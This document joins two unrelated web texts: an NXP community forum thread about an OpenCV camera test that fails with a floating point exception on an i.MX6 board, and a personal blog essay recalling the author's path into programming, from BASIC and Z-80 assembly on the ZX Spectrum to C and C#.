target_link_libraries(camera_test opencv_core opencv_ml opencv_highgui)
install(TARGETS camera_test DESTINATION /usr/bin)
~
I can create the image with this code and there is no problem, but when I try to execute it, I always get the same error:
~# camera_test 0
Trying camera at port 0
Floating point exception
There is no other error message and the code runs in my machine (native compilation) without any problem. Did someone experience this problem before? I had to patch the kernel in order to change the camera driver from mt9p032 to the mt9v032 (Phytec cameras) but I don't think this should have anything to do with it.... However, in the dmesg output I found this line:
coda 2040000.vpu: Direct firmware load for v4l-coda960-imx6q.bin failed with error -2
Could it be the problem? In that case, how can it be solved?
Best regards,
Juan
Hi Juan,
Our VPU firmware's name is vpu_fw_imx6q.bin , not v4l-coda960-imx6q.bin, so please check the reason why the message displayed.
Regards.
Weidong | https://community.nxp.com/thread/365990 | CC-MAIN-2018-22 | refinedweb | 357 | 60.41 |
Recommendation engines make future suggestion to a person based on their prior behavior. There are several ways to develop recommendation engines but for purposes, we will be looking at the development of a user-based collaborative filter. This type of filter takes the ratings of others to suggest future items to another user based on the other user’s ratings.
Making a recommendation engine in Python actually does not take much code and is somewhat easy consider what can be done through coding. We will make a movie recommendation engine using data from movielens.
Below is the link for downloading the zip file
Inside the zip file are several files we will use. We will use each in a few moments. Below is the initial code to get started
import pandas as pd from scipy.sparse import csr_matrix from sklearn.decomposition import TruncatedSVD import numpy as np
We will now make 4 dataframes. Dataframes 1-3 will be the user, rating, and movie title data. The last dataframe will be a merger of the first 3. The code is below with a printout of the final result.
user = pd.read_table('/home/darrin/Documents/python/new/ml-1m/users.dat', sep='::', header=None, names=['user_id', 'gender', 'age', 'occupation', 'zip'],engine='python') rating = pd.read_table('/home/darrin/Documents/python/new/ml-1m/ratings.dat', sep='::', header=None, names=['user_id', 'movie_id', 'rating', 'timestamp'],engine='python') movie = pd.read_table('/home/darrin/Documents/python/new/ml-1m/movies.dat', sep='::', header=None, names=['movie_id', 'title', 'genres'],engine='python') MovieAll = pd.merge(pd.merge(rating, user), movie)
We now need to create a matrix using the .pivot_table function. This matrix will include ratings and user_id from our “MovieAll” dataframe. We will then move this information into a dataframe called “movie_index”. This index will help us keep track of what movie each column represents. The code is below.
rating_mtx_df = MovieAll.pivot_table(values='rating', index='user_id', columns='title', fill_value=0)
There are many variables in our matrix. This makes the computational time long and expensive. To reduce this we will reduce the dimensions using the TruncatedSVD function. We will reduce the matrix to 20 components. We also need to transform the data because we want the Vh matrix and no tthe U matrix. All this is hand in the code below.
recomm = TruncatedSVD(n_components=20, random_state=10) R = recomm.fit_transform(rating_mtx_df.values.T)
What we saved our modified dataset as “R”. If we were to print this it would show that each row has two columns with various numbers in it that cannot be interpreted by us. Instead, we will move to the actual recommendation part of this post.
To get a recommendation you have to tell Python the movie that you watch first. Python will then compare this movie with other movies that have a similiar rating and genera in the training dataset and then provide recommendation based on which movies have the highest correlation to the movie that was watched.
We are going to tell Python that we watched “One Flew Over the Cuckoo’s Nest” and see what movies it recommends.
First, we need to pull the information for just “One Flew Over the Cuckoo’s Nest” and place this in a matrix. Then we need to calculate the correlations of all our movies using the modified dataset we named “R”. These two steps are completed below.
cuckoo_idx = list(movie_index).index("One Flew Over the Cuckoo's Nest (1975)") correlation_matrix = np.corrcoef(R)
Now we can determine which movies have the highest correlation with our movie. However, to determine this, we must gvive Python a range of acceptable correlations. For our purposes we will set this between 0.93 and 1.0. The code is below with the recommendations.
P = correlation_matrix[cuckoo_idx] print (list(movie_index[(P > 0.93) & (P < 1.0)])) ['Graduate, The (1967)', 'Taxi Driver (1976)']
You can see that the engine recommended two movies which are “The Graduate” and “Taxi Driver”. We could increase the number of recommendations by lower the correlation requirement if we desired.
Conclusion
Recommendation engines are a great tool for generating sales automatically for customers. Understanding the basics of how to do this a practical application of machine learning | https://educationalresearchtechniques.com/2018/12/26/recommendation-engine-with-python/ | CC-MAIN-2020-40 | refinedweb | 700 | 58.58 |
Introduction: How to Install Python Packages on Windows 7
For the complete and utter noob
(put
At the time of this draft, Python 2.7 is the stable install.
1 Person Made This Project!
- EmmanuelN3 made it!
Recommendations
23 Comments
4 years ago
Hi,
When Windows 7 doesn't have python 2.7 and I want to install python 2.7.13 first so how would I do this using batch file? Assume all setups are placed on common location.
4 years ago
Am having Problem Installing Python in my PC...See my Error please and advice me accordingly...
Thank you
4 years ago
Guys who need windows 7 key can go link: to got. It provide 100% working and to share.
4 years ago
This Instructable is out of date. Use this: it's automated with an installer, and installs a shell, too!
4 years ago
! I will try to make
something similar
5 years ago
If you encounter some problems when installing,you can try this link: .
5 years ago
Activate windows 7 click here:, you can find the keys you want in a low price that you have never imagined.
5 years ago
Please warn people that if they forget %path%
5 years ago
It is perfect! thank you dude
5 years ago
I followed the above steps. The simplejson-3.8.1-py2.7.egg directory was created under python2.7.11 (following all the correct paths...not repeating them here again)
But on running the "import simplejson" command at the python IDLE GUI command window i am getting this error:
>>> import simplejson
Traceback (most recent call last):
File "<pyshell#2>", line 1, in <module>
import simplejson
ImportError: No module named simplejson
Please suggest a solution for this
5 years ago
If someone need windows 7 key, i suggest you click site to got. My key got here and after i used is great working.
5 years ago on Introduction
tq! this help me a lot
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
you can also see it in the below link...
6 years ago on Introduction
Thanks for info. I have some quesion .
How to install libnss3.so python to win7
about this can u explain to me ?
7 years ago on Introduction
Great instructions but when I try to install simplejson my virus checker tells me its a virus and deletes it. Can I progress without simplejson ??
7 years ago on Introduction
Check your environment variables and add C:\python27 or C:\python33 if you have python 3 to the path
8 years ago on Introduction
Please help when I type python setup.py.install i get the following error
'python' is not recognised as an internal or external ciommand operable command or batch file.
What should I do to get the package started? I am a new user and want to learn Python well.
8 years ago on Introduction
It did work fine for my with Python 3.3 . Thank you PDXNAT ! | https://www.instructables.com/How-to-install-Python-packages-on-Windows-7/ | CC-MAIN-2021-17 | refinedweb | 525 | 75.4 |
>>
-
Best Server OS so far from Microsoft - 2012 R2I have used Windows Server from NT 3.5 to 2016 and so far the easiest to use is a close tie between 2012 R2 and 2016, so far 2012 R2 is still my favorite. Nice feature set, easy to use and configure.
What are the pros?Nice and full featured list of features Best bang for buck in the 2012 platform
What are the cons?Cost
Datacenter is the way to go for virtual machinesIf you run a datacenter with many virtual machines, you will probably save money by using Microsoft Windows Server Datacenter. It's the same server OS you'd get otherwise only you can install an unlimited number of VMs and choose from the different install options for each VM.
What are the pros?Never have to worry about the cost of spinning up a new VM.
What are the cons?Seems pricey, but run the numbers for your environment.
Questions & Answers
Discussions tagged with this product
Hyper-V VMC stuck at begin
I'm having some annoying issue with Hyper-V.
What will happen is the following: I right click a virtual machine in Hyper-V Manager
Help build array on MD3220 w/SSD cache, high perf tier 2012 R2 failover cluster
I have 3 Dell PowerEdge R820 servers running in duplex mode, directly attached to a Dell PowerVault MD3220 and MD1220 expansion
Help create array on MD3220 w/SSD cache, high perf tier 2012 R2 failover cluster
I’m migrating drives from an existing MD3220 to a new MD3220 which has several Dell Premium Features enabled. I need some advice
R820 stuck automatic repair loop Windows Server 2012 R2 can't access cmd prmpt
After rebooting one of my R820's last night (02 FEB) Windows 2012 R2 will not load at all. After going through the normal startup
Exchange 2013: Unable to mount Database but State is constant...
Hey,
after an accident in our datacenter, we have to recover our infrastructure. Currently, we stuck on the Exchange 2013-Server.
We
Current options for 2-factor auth in AD?
Has anyone successfully deployed 2-factor to their workstations for domain login? I'm looking for experience/recommendations of
What is wrong with this powershell New-ADUser
Hi guys, Im using this powershell script to create users from a .CSV file. From a list of 150 users, 32 have not been created.
An
3CX & Twilio, should be simple, right?
I've been trying to make these two things work together for a while. I can't get any outgoing calls to happen, and incoming calls
Unresponsive VM.. yet clock updates?!
Hi all,
I've been googling to try and find an answer to an issue that I've recently been presented with. Occasionally a server
AD FS 2.0 to 3.0
Well, it seems that there is no answer on this topic. But now I have an additional question. Maybe this will get people interested
HP Proliant ML10 v2 cannot boot after environmental power failure
Hi all,
I bought a HP Proliant ML10 v2 a montht ago. I installed Windows Server 2012 R2 Datacenter on it and it was working well
Server 2012 Licensing for 4 Processors
Hello, sorry if this question has been answered but according to all MS documentation, I'll need two licenses of Server 2012 R2
Hyper-V 2012 R2 Failover Cluster Major Issue
So here I am on hour who knows what dealing with this issue...
Basically we have two hosts in a Hyper-V Cluster and they will not
Misc Win10 GPO settings
I was wondering if anyone knew if there are GPO's that mimic the privacy questions you're asked when you first install Windows 10.
Time issues on a domain
I'm having time issues on my domain. In an effort to fix, I've set GPO's for the DC's to pull their time from the public NTP Pool,
Hard drive recommendations for Dell R710 running MS SQL
We have a Dell R710 that I am looking to replace the hard drives. This server hosted our MS SQL database for our NextGen EMR and
Windows Search Service - Not intended for "Enterprise"
I have a AD DFS namespace operating on a server with approximately 2.7 million files equating to 1.5TB of data, 800GB deduped.
I
Routing Problem | Portforwarding | Server connects to localhost but shouldn't
First, I apologize any spelling or grammatical mistakes and I hope that I can express myself reasonably understandable to explain
Drive Map to DFS Folder Getting Lost
We had a problem this morning with every user (about a dozen) in one of our small branch offices being unable to access a certain
New Veeam B&R Server/Repo
Hey Guys,
I have a decommissioned SuperMicro box, 2x Xeon, 32gb ram, 12 x 2tb disks direct attached.
I wish to make this my
iSCSI Errors in Windows Event Log
Well I eventually got mine running without errors and stable now for 88 days and running. This turned out to be a combination of a
System Center Licensing
Hey Guys,
I am trying to price out what I need for System Center 2012 licensing. In house we have a set up like this;Powershell
DHCP DNS issues setting up Virtual Windows 2012, 2008 DC Environment Virtualbox
I have setup a Virtual Lab in Virtualbox to simulate a Windows 2012 Primary Domain Controller and Windows 2008 Backup Domain
Weird duplication of files in Offline Folder
Hey Guys,
So I'm working on an issue where the user is working on a Windows 7 laptop with offline folders set up. The my documents
How do I replace a file once a year for all user profiles?
Hello,
Once a year, I have a database file that I need to copy to a folder within each users profile to replace last years
Virtual machines networking not working after reboot. ESXi 5.1u2
Hi all, I've got a strange one..
In our virtual center, machines that get rebooted are coming back up and not connecting to the
VLAN or Sub-Domains......that is the question
I am sure I am overthinking this but would like some advice please.
Small office with 3 locations, 20 Users. The client has a new
Terminal Server Woes
Just as a follow up. I also created a new admin user to test. I jumped on a spare machine on the branch network and logged into a
AD LDS Conifg with WordPress Site
We have recently setup a company community site using Wordpress with the Active Directory integration, which works perfectly. I
Windows Server 2012 Datacenter VM Licensing
Does anybody know whether the Windows Server 2012 Datacenter license covers all the VMs licensing too or just permit you to host
RDS on Windows Server 2012 R2
I am currently having trouble installing Remote Access and RDS onto my server that is running Windows Server 2012 R2. When
HPC Nodes between Windows Server 2008 R2 and 2012 R2?
Is it possible to create a HPC Head node on Windows Server 2012 R2 while have the compute nodes on Windows Server 2008 R2? Or
File share migration
I have to do two file server migrations in the upcoming weeks and I'm looking for the best way to do them.
One is a Server 2008
Who understands RAID, HYPER V and Server 2012
First off, why Hyper-V? I would tell you to run Citrix XenServer because it will save you about $8K. But anyway, run Server 2012
Servers scrubbed from DNS
Hello Spiceheads!
I had some "fun" yesterday. About 9:35am out of the blue all our printers went off line, and everyone lost
RDP wont work on Hyper-V Server after restart.
We had a power outage and all our server were shut down. I guess our issue probably was that the hosts were booting up at the same
Microsoft Server 2012 Datacenter Licensing
Hi Spiceheads,
I was wondering if anyone could clear up some questions I have with regards to Microsoft Server 2012 Datacentre
Server 2012R2 SMB scanning from Konica MFP
Hello Spiceheads,
We have a few Konica Minolta MFPs, the one i'm dealing with is a bizhub 223. and we also have a few Server
WSUS IIS Worker Process (w3wp.exe) Memory Usage
We've got 3 WSUS servers, a primary and 2 down stream serversall running on 2012 R2. The server uptimeon each is approximately 28
Why are Windows Server 2012 R2 Host Ping times worse than 2008 R2
Windows server 2008 R2 average 15ms while 2012 R2 average 530ms. Or what settings can be used to fix this? Just upgrading to
Windows Server 2012 R2 KMS setup
Hi,
We have recently setup a new network on Server 2012 R2 Datacenter to replace our old small business server, we are running
Windows licensing upgrade
I am writing a business case to obtain data center licensing for Windows server 2012R2 and need to outline the risks associated
Microsoft Licensing Policies
Can any one please explain me the Microsoft Licensing Policies for Servers & Virtualization ?
It is too messy and no co
How do I require SSL on IIS
Why is this so hard? I'm running windows server 2012r2 with IIS8. I am successfully hosting a website on it, however, I want to
How to Activate with MS Server R2 Datacenter Retail Key?
This key is not attached to a volume license account. Everywhere I read about this, people say they use MAK keys that are
IPv6 root hints
If I open properties on DNS manager and go to root hints, I have servers A-M, and all have IPv4 addresses.
So far, so good.
Selectively update DNS records
I'm running dual stack. Most servers have three IPv6 addresses on one NIC...one static, one RA, and one DHCPv6. I only want the
Automatically removing terminal server profiles
Has anyone come up with a clever way of removing terminal server profiles when the user is no longer in AD? I currently do it
Folder deployed on user pc via group policy
Hi
Can someone please explain how i can share a folder through group policy on my users desktop or in a specific folder , i am
Does moving to a VM change my licensing?
I have a physical server running Server 2012 R2
I'm going to P2V it before too long.
My VM server is licensed for Datacenter, so I
Projects
-
Firewall Security EnhancementsI will upgrade software, audit policies, and start firewall decryption
VEEAM ImplementationThe purpose of this project was to improve our disaster recovery plan and in turn our reaction time.
-
-
Blue Prism 6.2 Virtualized EnvironmentDesigned and setup a completely virtualized Blue Prism environment of 2 load balanced App servers, a...
Veeam Backup and ReplicationInstalling Veeam Backup and Replication on my existing infrastructure. It user to make VM backup a...
-
-
-
FSRM File Screening for MalwareImplemented FSRM passive file screen to alert IT when file types other than typical business files w...
Linking Office 365 with Active DirectoryWe want to start setting up our office 365 subscription and active directory to be SSO so there is o...
-
HYPER-V Failover ClusteringSetup 2 new Servers as HYPER-V Hosts with Failover Clustering and move all the VM's in the new HYPER...
Malwarebytes Server RebuildComplete fresh rebuild of our Malwarebytes Enterprise Security product on a new server.
HyperV Failover Pair to HA ClusterUpgrading our HyperV host server failover pair to a 4-node cluster with StarWind VSAN shared cluster...
New Server RoomSetup a server room with 7 machines, one router, one firewall, three gigbit switches with windows Hy...
Data Center EstablishedConstruction of new datacenter, domain controller, exchange server, cabling, ip exchange, CCTV, IBM ...
MS Windows 2012 R2 Hyper-VInstalled 3 Hyper-V hosts including one Datacenter edition of Windows 2012 R2
Server Infrastructure UpgradeThe project is an upgrade from a blade environment with vmware to a hybrid-cloud environment with Sy...
Starwind Appliance DeploymentDeploy Starwind Appliances at client site. Also deploy larger class B subnet to replace 254 address ...2
Upgrading to Windows Server 2012 R2Did an in-place upgrade of the existing servers running on Windows Server 2008 R2 to Windows Server...
Azure Mass Storage & Storage AccountsNew to Azure setting up storage account and mounting it locally on internal machines.
Infraestrutura - Networking and ServersCreate default networking and servers documentations. Migration Active Directory and replication sit...
DNS ServerInstallation of windows server 2012 Data center on Hyper-v installation of Active directory domain s...
Replace 10 year old physical serverReplacement of a 10 year old Dell Poweredge Server (Server 2008) with a new Dell server (T620) that ...
Adding MDM support for schoolsAdding MDM support so that we can manage domain-joined device and mobile devices in a "single pane o...
2-Factor-AuthenticationA customer demands higher security standards when working on their projects and therefore we need 2-...1
Hyper-V Cluster ProjectThe project involved migrating two stand-alone Windows Server 2008 R2 with Hyper-V servers to a thre...
-
MCSA 20409B Server Virtualization projectHands on project for my Microsoft 20409B end of module virtualization project for my MCSA and MGIT D...
-
-
-
SAS Visual Analytics DeploymentWe needed a way for our constituents to be able to view customized reports on demand. SREB accumula...
User Acceptance Testing (UAT)Bringing the three words together shows that the point of UAT is for business users to try and make ...
Cabling the server roomShutdown all servers, remove every cabel, Label the cabel, cable every server, switch etc.
-
WEB SERVERTRANSFER ALL 4 NOS OF WEBSITE FROM SHARED WEBSERVER TO OUR OWN WINDOWS 2008 DEDICATED WEBSERVER
Virtual AV ServerWe had well over 100 PCs with Avast! Endpoint Protection installed and no management server. It was ...
-
-
Hyper-V Production FarmMigrate production environment off of a mix of ESX / bare metal / Hyper-V to a consolidated, fault-t...
Active Directory Maintenance AutomationDesign and develop an automation solution to perform Active Directory maintenance.
-
-
3 Node Hyper-V ClusterBuild a 3-node Hyper-V Cluster for load balancing virtual machines (VMs) onto new platform.
New serversWe are finally replacing our Server 2003 machines with nice, shiny, new Servers.2
Replace CitrixReplace Citrix with another remote access system that is easier to support, and less resource intens...
Low cost virtual Windows Server 2012 DCDue to a number of clients increased interest in upgrading and/or virtualising Windows Sever 2012, I... | https://community.spiceworks.com/products/59198-microsoft-windows-server-2012-r2-datacenter/review/686317/flag | CC-MAIN-2019-18 | refinedweb | 2,412 | 59.43 |
So my question is this. If in a header file I have a function declaration:
extern void func(void* restrict, void* restrict);
void func(void*, void*) {}
restrict
"This is so I can compile the source file in C89 mode" - Simple reason:
restrict is not a reserved keyword until C99 see forword of C11 (C99 is the 2nd edition), so it will just be used as a name, which is ignored in the prototype.
But both function declarators (prototype and definition) have to specify the same type, i.e.
restrict is required in both.
You have to compile the header and the implemenation with the correct C version. For
restrict the definition is typically more relevant than the prototype, but the compiler might be able to detect violations in the caller. Always assume relying on such hacks breaks your code.
After a the comments, trying a bit of clairvoyancy:
If you want to make the code compile with ancient C90, yet take advantage of newer features where useful, you can use a macro:
#if this_is_c99_or_c11 #define RESTRICT retrict #else #define RESTRICT #endif void f(int * RESTRICT p); ... void f(int * RESTRICT p) { ... }
Still remember there can be problems cross-version compiling caller and callee. Check your target's ABI. | https://codedump.io/share/2cPYG1DiwHwe/1/specifying-pointers-as-restrict-only-in-declaration | CC-MAIN-2017-43 | refinedweb | 208 | 61.36 |
Jedi Master Yoda <yoda at dagobah.org> writes: > On Fri, 16 May 2003 23:46:23 +0200, Dirk Gerrits <dirk at gerrits.homeip.net> > spouted: > > I just saw a thread on comp.lang.lisp and comp.lang.scheme that referred > > to Common Lisp as Lisp-2 and to Scheme as Lisp-1. What gives? > > There are two families of Lisps, Common Lisp belongs to one kind and Scheme the > other. The actual difference is rather trivial, at least for outsiders. It's difficult to tell because your wording obscures what you are actually talking about, but you don't seem to have a clue. If you meant to suggest that the differences between CL and scheme are trivial you might as well have claimed that the differences between, say, C and Java are trivial (Note: I am *not* equating scheme with C or java with CL!). Lisp-1 and Lisp-2 are not aliases for scheme and CL respectively as has already been pointed out -- they refer to whether the lisp-dialect has different namespaces for variables and functions (the practice of refering to CL as a lisp-2 is a bit unfortunate anyway since it has about 7 odd namespaces). If you what you meant is that the difference between 1 namespace (lisp-1) and several namespaces (lisp-2; somewhat confusingly -- CL is more lisp-7) is trivial then the statement is less silly, but still a bit misleading -- if you'd try to to write lots of functional code in Lisp-2 you'd likely notice a practical difference to doing the same in Lisp-1. Anyway, someone interested in the pros and cons of Lisp-1/Lisp-2, the relationship between scheme and CL and the historical development of lisp can find relevant articles at <>. > However, the two camps will never be reconciled. Schemers think that > Scheme is Lisp done right, and Common Lispers think that Scheme is a > horrible abomination with not nearly enough syntax. I don't think that amongst the many complaints brought forward against scheme by CLers I've ever noticed "not nearly enough syntax" to figure prominently. > If I were in a particularly mischievous mood I would compare Common Lisp > to Perl, and Scheme to Python, but then I would get flamed to a crisp. But > I'm not, so I won't, so don't. Good thing you didn't then, because that would only have reinforced the impression of cluelessness. 'as | http://mail.python.org/pipermail/python-list/2003-May/205291.html | crawl-002 | refinedweb | 411 | 67.08 |
EM FHPlaneHole
Description
The FHPlaneHole tool inserts a plane hole object, that represents a FastHenry uniform conductive plane hole.
FastHenry Point FHPlaneHole
FastHenry Rect FHPlaneHole
FastHenry Circle FHPlaneHole
Usage
The FHPlaneHole object can be based on the position of a Draft Point object, or you can select the 3D location of the FHPlaneHole.
- Press the
EM FHPlaneHole button, or press E then H keys.
- Click a point on the 3D view, or type a coordinate and press the
add point button.
Alternatively, you can also:
- Select one or multiple
Draft Point object(s)
- Press the
EM FHPlaneHole button, or press E then H keys. As many FHPlaneHole objects will be created as the Draft Point objects, at the same coordinates of the Draft Points.
Remarks
FHPlaneHole objects have no meaning if they are not part of a
FHPlane. To adopt a FHPlaneHole within a FHPlane, use the
EM FHPlaneAddRemoveNodeHole command, or select the FHPlaneHole at FHPlane creation. To remove a FHPlaneHole from a FHPlane, you can use the EM FHPlaneAddRemoveNodeHole command.
- FHPlaneHole objects represent FastHenry plane holes, and therefore follow the same rules of the uniform conductive plane holes. In particular, holes are created removing the internal plane nodes from the plane node array, before constructing the segment mesh. You can enable the view of the internal FHPlane nodes by turning the FHPlane DataShowNodes property on. Three types of FHPlaneHoles exist, and can be selected by changing the DataType FHPlaneNode property.
- Point hole: Removes the single FHPlane internal node closer to the position of the FHPlaneHole. The Point FHPlaneHole is shown as a single vertex (small dot), to help to visualize its position; see the FastHenry Point FHPlaneHole picture above.
- Rect hole: Removes all the FHPlane internal nodes that are within as well as close to the area defined by the base point of the FHPlaneNode and the DataLength and DataWidth properties. This means that not only the internal nodes strictly within the rectangular area defined by the FHPlaneHole are removed, but also the internal nodes outside the rectangle, but within half of the internal node - node distance. The Rect FHPlaneHole is shown as a 2D rectangle, to help to visualize its position and area; see the FastHenry Rect FHPlaneHole picture above.
- Circle hole: Removes all the FHPlane internal nodes that are within as well as close to the area defined by the base point of the FHPlaneNode and the DataRadius property. This means that not only the internal nodes strictly within the circular area defined by the FHPlaneHole are removed, but also the internal nodes outside the circle, but within half of the internal node - node distance. The Circle FHPlaneHole is shown as a 2D circle, to help to visualize its position and area; see the FastHenry Circle FHPlaneHole picture above. Note that if the FHPlane discretization as specified by the Dataseg1 and Dataseg1 FHPlane properties is coarse, the shape of the circular hole can not resemble a circle. This is normal, and it is how FastHenry handles circular holes, not a defect of the ElectroMagnetic Workbench for FastHenry.
Options
- To enter coordinates manually, simply enter the numbers, then press Enter between each X, Y and Z component. You can press the
add point button when you have the desired values to insert the point.
- Press Esc or the Close button to abort the current command.
Properties
- DataX: the X coordinate of the FHPlaneHole
- DataY: the Y coordinate of the FHPlaneHole
- DataZ: the Z coordinate of the FHPlaneHole
- DataLength: the Rectangular hole length (along x from FHPlaneHole base point)
- DataWidth: the Rectangular hole width (along y from FHPlaneHole base point)
- DataRadius: the Circular hole radius
- DataType: the type of FastHenry plane hole. Can be "Point", "Rect" or "Circle".
Scripting
See also: FreeCAD Scripting Basics.
The FHPlaneHole object can be used in macros and from the Python console by using the following function:
hole = makeFHPlaneHole(baseobj=None, X=0.0, Y=0.0, Z=0.0, holetype=None, length=None, width=None, radius=None, name='FHPlaneHole')
- Creates a
FHPlaneHoleobject.
baseobjis the Draft Point object whose position can be used as base for the FHPlaneHole. It has priority over
X,
Y,
Z. If no
baseobjis given,
X,
Y,
Zare used as coordinates.
Xx coordinate of the hole, in absolute coordinate system.
Yy coordinate of the hole, in absolute coordinate system.
Zz coordinate of the hole, in absolute coordinate system.
holetypeis the type of hole. Allowed values are: "Point", "Rect", "Circle"
lengthis the length of the hole (along the x dimension), in case of rectangular "Rect" hole.
widthis the width of the hole (along the y dimension), in case of rectangular "Rect" hole.
radiusis the radius of the hole, in case of circular "Circle" hole.
nameis the name of the object
The placement of the FHPlaneHole can be changed by modifying its
Placement property, or changing the
X,
Y,
Z properties individually. Changing
X,
Y,
Z modifies the node position in the relative coordinate system of the
Placement.
Additionally, the _FHPlaneHole class exposes these methods. The _FHPlaneHole class can be accessed through the FHPlaneHole object Proxy (e.g. fhhole.Proxy).
pos = getAbsCoord()
- Get a
FreeCAD.Vectorcontaining the hole coordinates in the absolute reference system
pos = getRelCoord()
- Get a
FreeCAD.Vectorcontaining the hole coordinates relative to the FHPlaneHole Placement
pos = setRelCoord(rel_coord, placement=None)
- Sets the hole position relative to the placement
rel_coordis a FreeCAD.Vector containing the hole coordinates relative to the FHPlaneHole Placement
placementis a new FHPlaneHole placement. If
None, the placement is not changed
pos = setAbsCoord(abs_coord, placement=None)
- Sets the absolute hole position, considering the object placement, and in case forcing a new placement
abs_coordis a FreeCAD.Vector containing the hole coordinates in the absolute reference system
placementis a new FHPlaneHole placement. If
None, the placement is not changed
Example:
import FreeCAD, EM fhhole = EM.makeFHPlaneHole(X=1.0,Y=1.0,Z=0.0,holetype="Rect",length=1.0,width=2.0)
- | https://wiki.freecadweb.org/EM_FHPlaneHole | CC-MAIN-2021-10 | refinedweb | 984 | 53.1 |
A Developer.com Site
An Eweek.com Site
Type: Posts; User: mary_um
Thank you! I figured it out!
int Counter::nCounters = 0;
Counter::Counter(int i)
{
counter = i;
Counter
{
int counter;
int counterID;
int nCounters;
Counter(int preset);
void increment();
void decrement();
int getValue();
int getCounterID();
Disregard! I figured it out!!
Maybe you can help me with one more thing. I have been messing with the code how a while and I did at one point get it to read the file and give me the output I needed, which is two names, from the...
Thank you for the help (and posting advice). I really apprecaite it!
inputFile.open(fileName);
if (inputFile) {
while(getline(inputFile>> name))
cout<< name << endl;
this is where my issue is. the text did not turn red like I intended :/
#include <iostream>
#include <sstream>
#include <fstream>
#include <string>
using namespace std;
int main() {
ifstream inputFile;
string fileName, name, first, last, line;. | http://forums.codeguru.com/search.php?searchid=19748169 | CC-MAIN-2019-26 | refinedweb | 155 | 75 |
I/O
Introduction
The akka.io package has been developed in collaboration between the Akka and spray.io teams. Its design combines experiences from the spray-io module with improvements that were jointly developed for more general consumption as an actor-based service..
The guiding design goal for this I/O implementation was to reach extreme scalability, make no compromises in providing an API correctly matching the underlying transport mechanism and to be fully event-driven, non-blocking and asynchronous. The API is meant to be a solid foundation for the implementation of network protocols and building higher abstractions; it is not meant to be a full-service high-level NIO wrapper for end users.
Terminology, Concepts
The I/O API is completely actor based, meaning that all operations are implemented with message passing instead of direct method calls. Every I/O driver (TCP, UDP) has a special actor, called a manager that serves as an entry point for the API. I/O is broken into several drivers. The manager for a particular driver is accessible through the IO entry point. For example the following code looks up the TCP manager and returns its ActorRef:
import akka.io.{ IO, Tcp } import context.system // implicitly used by IO(Tcp) val manager = IO(Tcp)
The manager receives I/O command messages and instantiates worker actors in response. The worker actors present themselves to the API user in the reply to the command that was sent. For example after a Connect command sent to the TCP manager the manager creates an actor representing the TCP connection. All operations related to the given TCP connections can be invoked by sending messages to the connection actor which announces itself by sending a Connected message.
DeathWatch and Resource Management
I/O worker actors receive commands and also send out events. They usually need a user-side counterpart actor listening for these events (such events could be inbound connections, incoming bytes or acknowledgements for writes). These worker actors watch their listener counterparts. If the listener stops then the worker will automatically release any resources that it holds. This design makes the API more robust against resource leaks.
Thanks to the completely actor based approach of the I/O API the opposite direction works as well: a user actor responsible for handling a connection can watch the connection actor to be notified if it unexpectedly terminates.
Write models (Ack, Nack)
I/O devices have a maximum throughput which limits the frequency and size of writes. When an application tries to push more data than a device can handle, the driver has to buffer bytes until the device is able to write them. With buffering it is possible to handle short bursts of intensive writes --- but no buffer is infinite. "Flow control" is needed to avoid overwhelming device buffers.
Akka supports two types of flow control:
- Ack-based, where the driver notifies the writer when writes have succeeded.
- Nack-based, where the driver notifies the writer when writes have failed.
Each of these models is available in both the TCP and the UDP implementations of Akka I/O.
Individual writes can be acknowledged by providing an ack object in the write message (Write in the case of TCP and Send for UDP). When the write is complete the worker will send the ack object to the writing actor. This can be used to implement ack-based flow control; sending new data only when old data has been acknowledged.
If a write (or any other command) fails, the driver notifies the actor that sent the command with a special message (CommandFailed in the case of UDP and TCP). This message will also notify the writer of a failed write, serving as a nack for that write. Please note, that in a nack-based flow-control setting the writer has to be prepared for the fact that the failed write might not be the most recent write it sent. For example, the failure notification for a write W1 might arrive after additional write commands W2 and W3 have been sent. If the writer wants to resend any nacked messages it may need to keep a buffer of pending messages.
Warning
An acknowledged write does not mean acknowledged delivery or storage; receiving an ack for a write simply signals that the I/O driver has successfully processed the write. The Ack/Nack protocol described here is a means of flow control not error handling. In other words, data may still be lost, even if every write is acknowledged.
ByteString
To maintain isolation, actors should communicate with immutable objects only. ByteString is an immutable container for bytes. It is used by Akka's I/O system as an efficient, immutable alternative the traditional byte containers used for I/O on the JVM, such as Array[Byte] and ByteBuffer.
ByteString is a rope-like data structure that is immutable and provides fast concatenation and slicing operations (perfect for I/O). When two its own optimized builder and iterator classes ByteStringBuilder and ByteIterator which provide extra features in addition to those of normal builders and iterators.
Compatibility with java.io
A ByteStringBuilder can be wrapped in a java.io.OutputStream via the asOutputStream method. Likewise, ByteIterator can be wrapped in a java.io.InputStream via asInputStream. Using these, akka.io applications can integrate legacy code based on java.io streams.
Architecture in-depth
For further details on the design and internal architecture see I/O Layer Design.
Contents | http://doc.akka.io/docs/akka/2.2.1/scala/io.html | CC-MAIN-2014-52 | refinedweb | 913 | 54.52 |
Every programmer knows the first program one must accomplish when learning a new language. But it was only when I was about 16 that I’ve read the book “The C Programming Language”, by Brian W. Kerningham and Dennis Ritchie, where the first program was in fact:
#include <stdio.h> main() { printf("hello, worldn"); }
But my adventure in programming began some years before.
I was about eleven years-old and the ZX Spectrum was hype! I did not have one (yet!) but a school colleague had and so I borrow him the things’ manual. From there, I asked him to try some BASIC instructions that I’ve wrote in a sheet of paper. The next day he would bring me the screen output on the same paper. After studying that at home, I would ask him more tryouts… until he fed up.
After a while I convinced my parents that the ZX Spectrum was the future and they would like me to be in the future, right? Games were ok, but not my thing. After maybe a year or two I had these two books: “The Complete Spectrum ROM Disassembly”, by Dr. Ian Logan & Dr. Frank O’Hara, and “Z-80 Reference Guide”, by Alan Tully, and the Z-80 (the ZX Spectrum CPU) assembly was my game. In those years I’ve also packed in some custom hardware projects, one for LED light shows and other for connecting a dot matrix printer to the ZX Spectrum using a Centronics parallel interface.
After the ZX Spectrum, it came the Philips MSX and the Commodore Amiga (this supported the “hello, world” and my math and computer science degree) and then the IBM PC compatible ruled after the advent of Microsoft Windows 95. Somewhere in those early days even used an Apple ][ for developing a project for a contract.
Programming in college went about C, C++, PASCAL, LISP (“Lots of Irritating and Stupid Parentheses”: ah, those were the days!), PROLOG, ML, HyperTalk, SQLWindows and probably some others. After that, I ran into C# professionally and I’m an admirer ever since.
